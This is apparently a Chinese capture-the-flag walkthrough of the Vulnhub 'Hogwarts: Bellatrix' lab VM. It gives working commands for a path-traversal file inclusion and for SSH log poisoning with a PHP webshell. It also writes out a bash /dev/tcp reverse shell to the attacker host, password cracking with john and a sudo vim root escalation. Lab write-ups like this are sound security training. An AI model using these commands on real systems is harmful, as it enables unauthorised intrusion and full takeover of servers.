Vulnhub: Hogwarts: Bellatrix靶机

kali:192.168.111.111

靶机:192.168.111.228

信息收集

端口扫描

复制代码
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.228

访问80端口

查看源码,提示ikilledsiriusblack.php和文件包含的参数名file

漏洞利用

ikilledsiriusblack.php存在文件包含

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../etc/passwd

可以包含ssh日志文件/var/log/auth.log

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log

写入webshell到ssh日志文件

复制代码
ssh '<?php system($_GET["cmd"]);?>'@192.168.111.228

执行命令

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log&cmd=id

执行反弹shell

复制代码
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

提权

/var/www/html/c2VjcmV0cw==目录中发现密码字典和lestrange的密码密文

利用john爆破密文,密码:ihateharrypotter

复制代码
john hash --wordlist=./pass.txt

lestrange用户sudo权限

提权方法:https://gtfobins.github.io/gtfobins/vim/#sudo

提升为root

复制代码
sudo -u root vim -c ':!/bin/bash'

flag

相关推荐
Hello.Reader2 小时前
EDR与XDR如何选择适合您的网络安全解决方案
安全·web安全
cooldream20092 小时前
信息安全的基石:深入理解五大核心安全服务
数据库·安全·系统架构师
观测云2 小时前
观测云产品更新 | 安全监测、事件中心、仪表板AI智能分析等
人工智能·安全
AIGC方案2 小时前
2025 AI如何重构网络安全产品
人工智能·web安全·重构
谈不譚网安2 小时前
Cross-Site Scripting(XSS)
安全·web安全·xss
婷儿z3 小时前
系统安全及应用
安全·系统安全
蚰蜒螟5 小时前
jvm安全点(二)openjdk17 c++源码垃圾回收安全点信号函数处理线程阻塞
jvm·安全
moonsims6 小时前
低空态势感知:基于AI的DAA技术是低空飞行的重要安全保障-机载端&地面端
人工智能·安全
神经毒素14 小时前
WEB安全--Java安全--shiro721反序列化漏洞
安全·web安全
2501_9159090615 小时前
我用 Appuploader绕过 Mac,成功把 iOS 应用上线了 App Store
websocket·网络协议·tcp/ip·http·网络安全·https·udp